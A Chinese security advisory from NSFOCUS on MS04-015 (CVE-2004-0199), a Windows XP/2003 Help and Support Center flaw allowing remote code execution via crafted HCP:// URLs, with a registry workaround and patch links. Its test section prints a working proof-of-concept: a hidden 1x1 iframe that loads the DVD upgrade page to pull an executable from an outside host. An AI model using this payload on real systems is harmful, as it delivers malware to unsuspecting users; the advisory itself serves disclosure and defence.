安全研究

安全漏洞
Microsoft Windows HSC DVD Driver升级代码执行漏洞(MS04-015)

发布日期:2004-05-11
更新日期:2004-05-17

受影响系统:
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows 2003
描述:
BUGTRAQ  ID: 10321
CVE(CAN) ID: CVE-2004-0199

Microsoft XP帮助支持中心(Help and Support Center)是一款统一的帮助和支持服务中心,可把所有的支持服务,如远程协助、自动更新、联机帮助以及其他工具等集中在一个地方。

Microsoft HSC在处理DVD驱动升级的URI时存在问题,远程攻击者可以利用这个漏洞以目标用户进程权限在系统上执行任意命令。

Microsoft HSC包含各种HTML和Javascript文件,可由HSC内部使用。HTML文件属于本地电脑安全域,用于执行外部帮助程序。

通过构建特殊的URL,攻击者可以使用户的本地机器启动和处理helpctr.exe,并传递注入的URL到应用程序,然后在支持帮助中心出现帮助和支持DvD升级对话框。

通过DvD升级页面,注入URL连接到"upgrade now"按钮,通过点击此功能,用户就会被提示打开/保存提供(攻击者)文件的对话框。这允许攻击者在HSC上初始化DvDupgrade操作,注如入的JavaScript代码会以这些HTML文件上下文运行,如"HCP://system/DVDUpgrd/dvdupgrd.htm"。通过这个方法,攻击者可以在本地电脑域中运行脚本,如下载启动恶意EXE程序。

<*来源:Donnie Werner (morning_wood@frame4.com
  
  链接:http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt
        http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Donnie Werner (morning_wood@frame4.com)提供了如下测试方法:

<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe"
width="1" height="1">
</iframe>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在Windows注册表中删除如下键值:

HKEY_CLASSES_ROOT\HCP

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS04-015)以及相应补丁:
MS04-015:Vulnerability in Help and Support Center Could Allow Remote Code Execution (840374)
链接:http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx

补丁下载:

Microsoft Windows XP Home SP1:

Microsoft Upgrade Security Update for Windows XP (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=563F65A3-D793-47B4-A607-948CAA5B3454&displaylang=en

Microsoft Windows XP Professional SP1:

Microsoft Upgrade Security Update for Windows XP (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=563F65A3-D793-47B4-A607-948CAA5B3454&displaylang=en

Microsoft Windows XP 64-bit Edition SP1:

Microsoft Upgrade Security Update for Windows XP 64 Bit Edition (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EB954F03-EFC6-45FA-B87C-E29135199DC9&displaylang=en

Microsoft Windows XP 64-bit Edition Version 2003 SP1:

Microsoft Upgrade Security Update for Windows XP 64 Bit Edition (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EB954F03-EFC6-45FA-B87C-E29135199DC9&displaylang=en

Microsoft Upgrade Security Update for Microsoft Windows Server 2003 and Windows XP 64 Bit Edition Vers 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=E05DE6AB-FB0D-4A0E-B34E-BB69B9D6BA74&displaylang=en

Microsoft Upgrade Security Update for Windows XP 64 Bit Edition 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EB954F03-EFC6-45FA-B87C-E29135199DC9&displaylang=en

Microsoft Windows XP Professional :

Microsoft Upgrade Security Update for Windows XP (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=563F65A3-D793-47B4-A607-948CAA5B3454&displaylang=en

Microsoft Windows XP Home :

Microsoft Upgrade Security Update for Windows XP (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=563F65A3-D793-47B4-A607-948CAA5B3454&displaylang=en

Microsoft Windows XP 64-bit Edition :

Microsoft Upgrade Security Update for Windows XP 64 Bit Edition (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EB954F03-EFC6-45FA-B87C-E29135199DC9&displaylang=en

Microsoft Windows Server 2003 Standard Edition :

Microsoft Upgrade Security Update for Windows Server 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=50AD42D7-81BD-4F96-9AD1-0E67310551DF&displaylang=en

Microsoft Windows Server 2003 Enterprise Edition :

Microsoft Upgrade Security Update for Windows Server 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=50AD42D7-81BD-4F96-9AD1-0E67310551DF&displaylang=en

Microsoft Windows Server 2003 Web Edition :

Microsoft Upgrade Security Update for Windows Server 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=50AD42D7-81BD-4F96-9AD1-0E67310551DF&displaylang=en

Microsoft Windows Server 2003 Enterprise Edition 64-bit :

Microsoft Upgrade Security Update for Microsoft Windows Server 2003 and Windows XP 64 Bit Edition Vers 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=E05DE6AB-FB0D-4A0E-B34E-BB69B9D6BA74&displaylang=en

Microsoft Windows XP 64-bit Edition Version 2003 :

Microsoft Upgrade Security Update for Windows XP 64 Bit Edition (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EB954F03-EFC6-45FA-B87C-E29135199DC9&displaylang=en

Microsoft Upgrade Security Update for Microsoft Windows Server 2003 and Windows XP 64 Bit Edition Vers 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=E05DE6AB-FB0D-4A0E-B34E-BB69B9D6BA74&displaylang=en

Microsoft Upgrade Security Update for Windows XP 64 Bit Edition 2003 (KB840374)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EB954F03-EFC6-45FA-B87C-E29135199DC9&displaylang=en

浏览次数:3542
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障